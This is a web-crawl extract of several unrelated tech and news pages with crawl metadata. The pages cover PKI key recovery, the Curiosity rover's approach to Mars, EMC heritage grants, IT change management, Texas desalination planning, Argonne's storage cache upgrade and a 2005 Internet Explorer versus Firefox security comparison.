then be given to different trusted people, or encrypted with each of their public keys and stored (perhaps on a floppy!) by the key's owner. In either case, it is impossible for one person alone to reconstruct the private key. If you plan to use PKI on a large scale or to protect information over a significant period of time, the ability to recover or reconstitute lost keys should be on your product requirements checklist. Is "everyday" PKI security enough for your organization? If all you are doing is encrypting and signing email or authenticating your web server, everyday security is probably good enough. However, with PKI you have an opportunity to streamline your procedures for protecting and sharing sensitive and valuable information. Appropriate use of PKI can reduce costs, speed operations, and open up new business opportunities by allowing you to safely access and obtain that information via your internal network. If you access your data over the Internet, you will want to use a stronger level of PKI, with more sophisticated software, operations, and longer keys. You owe it to yourself to investigate what doors PKI can open for you and your organization. ITU-T Recommendation X.509 (1997 E): Information Technology - Open Systems Interconnection -- The Directory: Authentication Framework, June 1997. A widely deployed, international standard for certificates http://www.ietf.org/rfc/rfc3280.txt -- Internet X.509 Public Key Infrastructure - Certificate and Certificate Revocation List (CRL) Profile (RFC 3280) http://home.netscape.com/eng/ssl3/draft302.txt - The SSL Specification http://www.uk.pgp.net/pgpnet/pgp-faq - A PGP FAQ http://www.ietf.org/rfc/rfc2440.txt - The PGP Standard (RFC 2440) Applied Cryptography, Second Edition by Bruce Schneier, John Wiley & Sons, New York, 1996 -- Offers a detailed discussion of cryptographic techniques including PKI (also an impressive-looking addition to your bookcase) Beth Cohen is president of Luth Computer Specialists, Inc., a consulting practice specializing in IT infrastructure for smaller companies. She has been in the trenches supporting company IT infrastructure for over 20 years in a number of different fields, including architecture, construction, engineering, software, telecommunications, and research. She is currently consulting, teaching college IT courses, and writing a book about IT for the small enterprise. Debbie Deutsch is a principal of Beech Tree Associates, a data networking and information assurance consultancy. She is a data networking industry veteran with 25 years experience as a technologist, product manager, and consultant, including contributing to the development of the X.500 series of standards and managing certificate-signing and certificate management system products. Her expertise spans wired and wireless technologies for Enterprise, Carrier, and DoD markets.
<urn:uuid:d5361fdc-b3d5-460d-9748-b96c3365493e>
CC-MAIN-2017-04
http://www.enterprisenetworkingplanet.com/print/netsecur/article.php/2223381/Public-Key-Infrastructure-Invisibly-Protecting-Your-Digital-Assets.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280587.1/warc/CC-MAIN-20170116095120-00023-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94391
2,892
3.21875
3
NASA noted that as of last Friday its biggest Mars explorer ever will be within 100 days of landing on the surface or the red planet. NASA said at that precise time, the mission has about 119 million miles (191 million kilometers) to go and is closing at a speed of 13,000 mph (21,000 kilometers per hour). In the news: The sizzling world of asteroids NASA launched the one-ton Mars Science Laboratory spacecraft on Nov. 26, 2011 which will ultimately deliver the rover Curiosity to the surface the planet on Aug. 5, 2012. NASA said Curiosity's landing site is near the base of a mountain known as Mount Sharp inside Gale Crater, near the Martian equator. Researchers plan to use Curiosity to study layers in the mountain that hold evidence about wet environments of early Mars. According to NASA, Mount Sharp rises about 3 miles (5 kilometers) above the landing target on the crater floor, higher than Mount Rainier above Seattle, though broader and closer. It is not simply a rebound peak from the asteroid impact that excavated Gale Crater. A rebound peak may be at its core, but the mountain displays hundreds of flat-lying geological layers that may be read as chapters in a more complex history billions of years old. Several craters on Mars contain mounds or mesas that may have formed in ways similar to Mount Sharp, and many other ancient craters remain filled or buried by rock layers. Some examples, including Gale, hold a mound higher than the surrounding crater rim, indicating that the mounds are remnant masses inside once completely filled craters. This presents a puzzle about how environmental conditions on Mars evolved, NASA said. "Landing an SUV-sized vehicle next to the side of a mountain 85 million miles from home is always stimulating. Our engineering and science teams continue their preparations for that big day and the surface operations to follow." said Pete Theisinger, Mars Science Laboratory project manager at NASA's Jet Propulsion Laboratory in Pasadena, Calif., in a statement. NASA calls the laboratory, which is expected to operate for at least two years once it arrives, the biggest astrobiology mission to Mars ever. The Mars Science Laboratory rover Curiosity will carry the biggest, most advanced suite of instruments for scientific studies ever sent to the Martian surface. Curiosity will use an onboard laboratory to study rocks, soils, and the local geologic setting in order to detect chemical building blocks of life. Layer 8 Extra Check out these other hot stories:
<urn:uuid:85f60554-a4e3-4313-9cb7-16378004ebdf>
CC-MAIN-2017-04
http://www.networkworld.com/article/2222271/wi-fi/nasa--mars-lab-mission-100-days-from-landing-on-red-planet.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00509-ip-10-171-10-70.ec2.internal.warc.gz
en
0.919578
505
3.84375
4
Cultural heritage is captured in books, art, and artifacts stored in museums, libraries and other facilities around the world. However, many treasures are in locations where they are unprotected from the risks of degradation or destruction. EMC contributes our expertise to help ensure these cultural treasures are available for future generations to access and enjoy. Through our Information Heritage Initiative, EMC provides products, services and financial assistance for digital information preservation programs worldwide. Through our Heritage Trust Project, EMC provides grants to local institutions striving to preserve the artifacts under their care. Digitizing not only prevents these pieces from disappearing, but provides access for students, scholars and others who may not be able to visit these items in person. Since 2007, we have provided more than $42 million in products, services and financial assistance for digital information preservation programs worldwide. Heritage Trust Project EMC’s Heritage Trust Project recognizes the importance of local preservation projects. The Project supports community-based digital curation efforts around the world with cash grants to local cultural institutions, archives, or private collections. New grants are awarded every year through an open application process. The 2016 application cycle will open on April 6, 2016. Beginning in 2012, we showcased the Project on EMC’s Facebook page, where applicants now submit their proposals directly. An internal group of judges reviews the proposed projects, looking specifically at the potential impact and the sensitive nature of the project. The group chooses seven finalists and then a public vote is held to pick the winners. In 2015, 24 countries were eligible to participate in the Project. The three winners were: The Secrets of Radar Museum, Canada During World War II, Canada provided the 2nd largest radar contingent, loaning more than 6,000 personnel to the British Royal Air Force alone, as well as building and maintaining radar on shore. These men and women signed the Official Secrets Act, standing by as the history of the war unfolded in texts and film without their inclusion. The Secrets of Radar Museum is the only radar-specific history museum in Canada. It shares the stories that World War II veterans were not allowed to tell due to a 50-year oath of secrecy. Through digitization, the museum will be able to share these materials with a much broader audience. University of Rosario, Colombia The Historical Archive of the University of Rosario preserves and safeguards a collection of more than 950 volumes of manuscripts and printed documents concerning the history of the College between the seventeenth and twentieth centuries, including a set of Royal Decrees issued between the kingdoms of Felipe IV and Carlos IV. The Royal Decrees provide insights into colonial institutions and society. Despite their great historical importance, the royal decrees have not received adequate treatment and have begun to deteriorate, requiring digitization to preserve this important collection. The Filipinas Heritage Library The Ulahingan is a major epic of the Manobo indigenous group in Mindanao, Philippines, with 4,000-6,000 lines per episode and 79 episodes on average. This tradition is orally passed from one generation to the next. The epic has been orally recorded on over 1,200 items of reels and cassette tapes. The Filipinas Heritage Library (FHL) recognizes the need to digitally preserve these traditions as part of its mission to preserve and promote accessibility to educational resources on Philippine culture and heritage for the present and future generations. Heritage Trust 2014: Where Are They Now? In 2014, EMC awarded organizations from India, Canada and the United Kingdom with Heritage Trust grants. Updates on their progress are provided below. The Merasi Legacy Project (India) “Merasi” translates to “musician”, and is the name given to a community of people with a rich musical culture who live in the Thar Desert in northwestern Rajastthan, India. Existing on one of the bottom rungs of the Indian caste system, which to this day partially dictates how Indian society functions, the Merasi people have been denied access to education, healthcare, and political representation, with most living in dire poverty. In the past, the history and musical traditions of the Merasi people were handed down orally by older members of the community, but because of the abuse and negativity attached to Merasi history, many younger people have shunned cultural musical practices. In 2014, Folk Arts Rajastthan (FAR), an organization that desired to preserve this musical tradition, was awarded an EMC Heritage Trust grant to work with and train the youth of the Merasi community to document their people’s musical heritage through audio and video recordings. Thanks to the grant, in addition to training within the community, FAR has been able to purchase the up-to-date software and audio and video equipment needed to preserve this threatened global musical treasure. The result will be an archive of audio and video recordings, a web site where the world-at-large can learn more about Merasi heritage, and a book about the community’s musical tradition. “For a while, talented young people in the community were seeking any alternative they could to becoming musicians. Now, 10 years into our project, that’s no longer the case. Young people are beginning to understand that they have an honored legacy that is recognized around the world,” said Karen Lukas, Director of FAR. Nikkei National Museum Internment Project (Canada) On February 24, 1942, lives of more than 20,000 Japanese Canadians were forever altered when Canadian Prime Minister William Lyon Mackenzie King called for the forced relocation of all persons of Japanese origin to designated “internment” sites at least 100 miles from the West Coast of British Columbia. Ten days following the order, the first 2,500 Japanese Canadians were removed to Hastings Park in Vancouver, where they were held for months at a time before being sent to internment camps in the British Columbia interior. In 2014, the Nikkei National Museum was awarded an EMC Heritage Trust grant to aid its efforts to gather, preserve, and share information related to the internment at Hastings Park. The grant helped the museum catalogue, scan, digitize, and upload a growing collection of memorabilia to its searchable database (www.nikkeimuseum.org). The museum also used the funds to increase the website’s capacity and ease-of-use, hire contract archivists, and purchase desperately needed archival supplies. The museum hopes to one day include the names of all 8,000 Japanese Canadians once detained there on its website. “There is an interest now to reclaim the history,” said Sherri Kajiwara, Director/Curator, Nikkei National Museum. “It’s not just for cultural reasons. It’s also for human rights reasons, so that things like this will be remembered, not forgotten, and won’t happen again.” Christmas Lectures (United Kingdom) For nearly 200 years, the Christmas Lectures hosted by the Royal Institution of Great Britain have brought science to life through spectacular presentations designed to capture the attention and engage the minds of young audiences. Aimed at children ages 11 to 17, the Christmas Lectures have covered a wide range of fascinating topics including astronomy, insect habits, the language of animals and robot technology. In 1966, BBC began broadcasting the Christmas Lectures annually, creating a library of 49 uninterrupted years’ worth of footage. In 2014, the Royal Institute was awarded an EMC Heritage Trust grant to aid the digitization and online availability of this vast, educational video collection, and to help locate 16 years’ worth of missing footage. With help from EMC’s grant, 19 Christmas Lectures were online by October 2015, and 10 years’ of missing footage had been located. The Royal Institute plans to have all available lectures digitized and online by November 2016 to coincide with the 80th anniversary of the lectures’ first appearance on the BBC. “We hear stories from teachers who remember watching the lectures as children, and now as teachers, they use our footage to explain an area of science to the next generation,” says Hayley Burwell, Royal Institute’s head of Marketing and Communications. “That’s a really wonderful legacy.”
<urn:uuid:37e032de-2838-4bc2-a215-a3ab176b4481>
CC-MAIN-2017-04
https://www.emc.com/corporate/sustainability/strengthening-communities/heritage.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00509-ip-10-171-10-70.ec2.internal.warc.gz
en
0.944746
1,699
2.5625
3
Changes to systems and networks happen every day. When implemented, changes usually come with some risk of system failure. They can also inadvertently weaken security. A documented, policy-driven change management process helps reduce risks associated with change. When we make a change to a system or network, we face the possibility that security may be weakened or that the risk of business process interruption increases. This includes increasing risk to data unexpectedly crossing trust boundaries. A trust boundary exists between two network segments or two systems with different trust levels. A trust level is determined by how well the infrastructure and software is hardened and monitored. For example, a system handling payment card information (PCI) might possess a higher trust level than a file server. In that case, if data passes from the PCI system to the file server, they cross a trust boundary. And there is always the risk that the changes to a system or network device can cause infrastructure or software failure. Infrastructure failure not only affects the changed business process, but it can also affect the organization’s ability to execute downstream business processes: processes relying on input from the failed process. Let’s walk through a simple example of how adding a new system can increase risk. In Figure A, we see a segmented network. Security has done a good job of ensuring the backup VLAN 20 (red) is separated from the general business VLAN 10 (yellow). An access control list helps keep the unauthorized from backed up information. A new project is about to implement a retail sales network, as shown in Figure B, including accepting customer payment cards. This new network is also segmented as VLAN 30 (green), presumably preventing payment card information access by anyone or anything on VLAN 10. However, one step in the implementation process is to ensure the retail network could print to a shared printer: a cost management decision. This breaks security by allowing PCI to cross a trust boundary, between VLAN 10 and VLAN 30, that should be insurmountable. If this change runs through a change management process, the printing risk issue would likely be identified and an adjustment made. If no change management process exists, the risk to payment card data would likely be higher than security or management expected. Setting up a change management process begins with a policy. The policy should clearly state that no change may be made to production infrastructure or systems without passing through the change management process. As we discuss later, this means the process must include how to make changes during business continuity events. Oversight: The oversight body of change management is often known as the change advisory board (CAB). The board is responsible for developing change procedures and making decisions regarding high risk changes. Some believe all changes should go through the CAB. However, this can unnecessarily slow the change process. So many security professionals believe the CAB should only review changes that have a higher than normal probability to interrupt a critical business process: either via unavailability or by data compromise. Other changes are reviewed by representatives of key stakeholder teams. In addition to the the CAB, the day-to-day change management process must be assigned to a responsible manager. In my case, I was responsible for the change process as the director of information security. My team received change requests and ensured the correct sign offs were obtained. The process: The change process should always include three phases: submission, change approvals, and a decision point at which the change management team decides whether or not the change should go before the CAB. Finally, the organization must identify who must sign off on changes to ensure the proper reviews are completed. Reviewers normally include server engineering, network engineering, software development, technical operations, and security. The important takeaway is to include every team necessary to ensure any availability or security risk is addressed before implementing the change. The change process begins with submission of a change request to the team responsible for managing the change management process. Change request documents include: - A description of the change - A list of all systems and network devices affected, including relevant network and data flow diagrams - A detailed implementation plan - A detailed back out plan for use if things do not go well during implementation - A description of the potential risk associated with the change The change team ensures copies of the change request go to all signatories. In many cases, the approval process is automated. We used Microsoft SharePoint and a proprietary workflow process. Expedited changes: The standard change process should not stand in the way of recovery from a business continuity event. Such changes should be made quickly, yet subject to review after business process recovery. “Quickly” does not mean the response team fails to document the change enough for later review and possible removal. The Final Word Change management is not an option. It is an important piece of business interruption prevention and helps ensure security risk does not drift up during projects and day-to-day activities. This article is published as part of the IDG Contributor Network. Want to Join?
<urn:uuid:ff661297-707f-4099-8001-c078e32d5172>
CC-MAIN-2017-04
http://www.csoonline.com/article/3067112/business-continuity/ensure-business-continuity-with-change-management.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00381-ip-10-171-10-70.ec2.internal.warc.gz
en
0.941973
1,030
2.515625
3
The Texas Legislature is addressing water desalination in the way it should — years before the water purification process becomes mandatory for the state. Water already is in short supply in 2014, so start planning desalination now. Why wait until Texas gets dangerously close to running out of water to begin dealing with the matter? Members of the Legislature’s Joint Interim Committee to Study Water Desalination heard testimony about costs and other details of desalination from water experts at a recent hearing. The joint committee, which includes five state senators and seven House members, will have public hearings throughout the state in weeks to come. Desalination is removing salt and impurities from seawater or brackish groundwater to make it usable for human consumption. Texas has more than 26 million people and is projected to have more than 46 million by 2060. After years of drought, water supplies are getting scarce in many parts of the state. Lubbock and other cities have drought restrictions in place. If that’s the circumstance now, what will it be like in the year 2060, with 20 million more thirsty Texans than we have now? Members of the joint committee were told municipal water demands likely will increase by more than 70 percent over the current need in 2060. The weather in Texas is not going to support the water demands of the future, testified Steve Lyons, a meteorologist in charge of the Weather Forecast Office in San Angelo and an adjunct professor of tropical and marine weather at Texas A&M University. Desalination will be a necessity to generate water for the needs of the Lone Star State. San Antonio is building a desalination plant, according to Gregorio Flores III, vice president of public affairs at the San Antonio Water System. The estimated cost of desalinating 1,000 gallons of water is $3.49, he said. That’s probably less than most people would expect. The average family uses about 6,500 gallons a month, which means about $22 more per month. Cities such as Houston or Corpus Christi could easily use nearby seawater for desalination, but questions remain about the process and costs: Would pipelines have to be built between the Gulf Coast and other Texas cities? How many places in Texas could desalinate salty groundwater? Private industries in America historically have found the cheapest and most efficient ways to solve problems. Competitive businesses may be able to lower the costs of desalination even more. The problems of Texas’ future water needs are clear, and it’s obvious desalination will have to be part of the solution. The Legislature is working to make it possible to have the desalination technology and infrastructure in place when it is needed. That farsightedness is going to be vital some day in the not-too-distant future. ¦ Our position: The drought of recent years isn’t over, but it’s encouraging to receive the rainfall we have had in May and June. But even if the drought officially ended this summer and another drought did not come for the next 45 years, there still would not be enough water, based on average levels of Texas rainfall, to meet the needs of Texas in 2060. ¦ Why you should care: People have taken water for granted for many decades, but Texas officials and residents are beginning to understand what an important commodity it is. Desalination will be an important part of providing our state's water needs in the future. ©2014 the Lubbock Avalanche-Journal (Lubbock, Texas)
<urn:uuid:a9cfd539-0859-4f77-8dce-c389082929bb>
CC-MAIN-2017-04
http://www.govtech.com/state/Editorial-Planning-for-Desalination-Now-will-Help-Meet-Our-Future-Needs.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00381-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951748
745
2.875
3
The Argonne Leadership Computing Facility (ALCF), a DOE Office of Science user facility, is on-track to hosting the fastest GPFS file system in the world. The innovative storage upgrade project is mainly concerned with reducing the amount of time users have to spend managing the massive amounts of data generated by the organization’s supercomputers. Ask a room of computational scientists about their day to day challenges and chances are that data management will rank pretty high. Transferring files and moving or storing data can also be time-consuming. Optimization efforts seek to reduce this “distraction” so users can spend more time on their core work. “I/O is generally considered overhead because it’s time not spent doing computations,” said ALCF Director of Operations Bill Allcock, who is heading up the storage upgrade. “The goal is to have a system that moves the data as fast as possible, and as easily as possible so users can focus on the science.” The first phase of the upgrade, already completed by the ALCF’s operations team, added a second system to compliment the primary disk storage system, an IBM General Parallel File System (GPFS) that offers 20 petabytes (PB) of usable space and a maximum transfer speed of 240 gigabytes per second (GB/s). The second GPFS configuration provided an additional 7 PB of storage and 90 GB/s of transfer speed. Despite their being two filesystems, accessing project data is enabled by what appears to be a single project root directory. According to the ALCF team, the next phase of the storage upgrade is where the real innovation lies. The first step was to install 30 GPFS Storage Servers (GSS) between the compute system and the two storage systems. IBM is helping the operations crew to customize and test the system’s Active File Management (AFM) feature, which will enable it to be used like a cache. The ALCF explains: In essence, this GSS system will serve as an extremely large and extremely fast cache, offering 13 PB of space and 400 GB/s of transfer speed. The idea is that it will act as a buffer to prevent the compute system from slowing down due to defensive I/O (also known as checkpointing), analysis and visualization efforts, and delays caused by data being written to storage. “We’re basically developing a storage system that looks like a processor,” Allcock said. “To the best of my knowledge, no other facility is doing anything like this yet.” Projects will write to the cache, and then the AFM software will copy the data to the project storage systems. Files will be removed from the cache according to utilization and retention rules, but users will still be able to access those files seamlessly without having to know whether they are still on the cache or in storage. “They will have the option to check where the data is located,” says Allock, “but because the cache is so huge, odds are they will never need to stage the data back into the cache after it has been evicted.” The cache-like configuration is scheduled to come online this fall.
<urn:uuid:a22561e6-6dc0-49e8-952c-962ad3ac6f10>
CC-MAIN-2017-04
https://www.hpcwire.com/2014/08/19/alcf-optimizes-io-innovative-cache/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00371-ip-10-171-10-70.ec2.internal.warc.gz
en
0.953425
671
2.703125
3
Internet Explorer is a graphical web browser made by Microsoft and comes integrated with Windows. Even though it’s by far the most widely used browser, since 2004 it slowly began losing popularity to other browsers like Mozilla Firefox, its Open Source rival developed by the Mozilla Foundation. Internal security architecture of IE and Firefox Microsoft Internet Security Framework brings a wide variety of security features to IE, features like SSL, PCT (both public-key-based security protocols are implemented in Firefox), authentication using public keys from Certificate Authorities (Verisign’s Digital IDs), CryptoAPI (used to incorporate cryptography into applications) and in the future, it will incorporate Microsoft Wallet into Internet Explorer. IE6SP1 comes with pop-up blocking, a feature long expected which Firefox had since before its name (it was originally known as Phoenix and briefly as Firebird). They are both able to selectively block pop-ups or view blocked pop-ups later. IE6 also provides different levels of security zones thus dividing the Internet into 4 categories: Internet, Local Intranet, Trusted Sites, and Restricted Sites. Other features it possesses are fault collection (more of a Windows feature, it allows users to upload crash information to Microsoft for analysis), content-restricted IFrames (enhances security of iFrames by disabling script for their content) and Content Advisor (objectionable content filtering). It also uses ActiveX scripts, a technology that allows a web designer to add music and animations to a page. Due to high number of malicious designed websites in which small scripts automatically download malware to users computers, Microsoft added a warning prompt to IE in order for a user to choose blocking ActiveX on a page. Firefox doesn’t use ActiveX technology and even though this might appear that it restricts web features, use of ActiveX for important tasks in web pages seems most unlikely. In addition to the features already mentioned (pop-up blocking, SSL and PCT public key authentication) Firefox strikes back with other cool additions like switching user agents (to pretend you are Googlebot or IE2SP8), referrer disabling while browsing, viewing http headers when clicking on links, disabling cookies, java and images in a 2 click step and others. All in all, preserving security while surfing is a balancing act, the more open you are to downloads of software and to multimedia features, the greater your exposure to risk. Large Flaws And Timeline In Which Fixes Were Released Please note that the information was added at the time of writing of this article – March 17th 2005. Some of it may be incorrect now. According to secunia.com Internet Explorer has 20 out of 79 security vulnerabilities that are still not patched in the latest version (with all vendor patches installed and all vendor workarounds applied), while Firefox has only 4 out of 12 security vulnerabilities unpatched. Based on information on secunia.com (1 and 2) we can see the benefit of an Open Source browser in the security field: while Internet Explorer only issued a patch for 52% of the bugs found and applied partial fixes in 14%, Firefox has not only patched 69% of its flaws but it has never used a partial fix or a workaround. Quoting Marc Erickson: “Its Open Source nature means that anyone can look at the code and either find or fix holes – and development can go on 24 hours a day, as programmers in different time zones around the world wake up and begin their day. 24 hour development is extremely difficult for most proprietary software companies to do – they need to be very large – like Microsoft – and then they run into large corporation difficulties – politics, turf wars, who gets credit for accomplishments, project coordination, how does a boss in one time zone supervise employees around the world when he has to sleep, etc. If we look at Secunia’s criticality graphs (1 and 2) we can see that Firefox has 0% extremely critical and 8% highly critical bugs while Internet Explorer has 14% extremely critical and 27% highly critical bugs. Comparison Of The Two Browsers The biggest challenge facing Firefox is that even though it offers tabbed browsing, live bookmarks, text zooming, pop-up blocking and a superior user interface, Microsoft’s Internet Explorer is still the most widespread browser. After all, every copy of Microsoft Windows sold includes a version of Internet Explorer and every Web site is optimized for Internet Explorer. A Google fight reveals us: Internet Explorer – 36,000,000 results, and surprisingly, Firefox – 31,000,000 results. Still, Firefox has its flaws like crashing while trying to view PDF files and taking a lot of time to load. If the next IE version would support tabbing and would be 50% more secure than before, Microsoft would surely maintain dominance in the field. According to W3Schools, Firefox has slowed in growth over the past few months and it now has 21% of usage share, compared to IE6 which has 64%.) Expectations for the future At the present time Firefox seems more secure than Internet Explorer, but what will the future bring? Microsoft has made spyware prevention one of its primary missions as well, so its browser may improve too in that regard, but for now, switching browsers is the best defense against malware. As more and more users dump IE due to its lack of features and move towards a faster and more efficient alternative like Firefox, virii and spyware programmers will start using it as their new “feeding ground.”
<urn:uuid:5f385025-ec93-4fa0-ac96-20d68fe22eda>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2005/05/23/does-firefox-really-provide-more-security-than-internet-explorer/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00098-ip-10-171-10-70.ec2.internal.warc.gz
en
0.932347
1,138
2.6875
3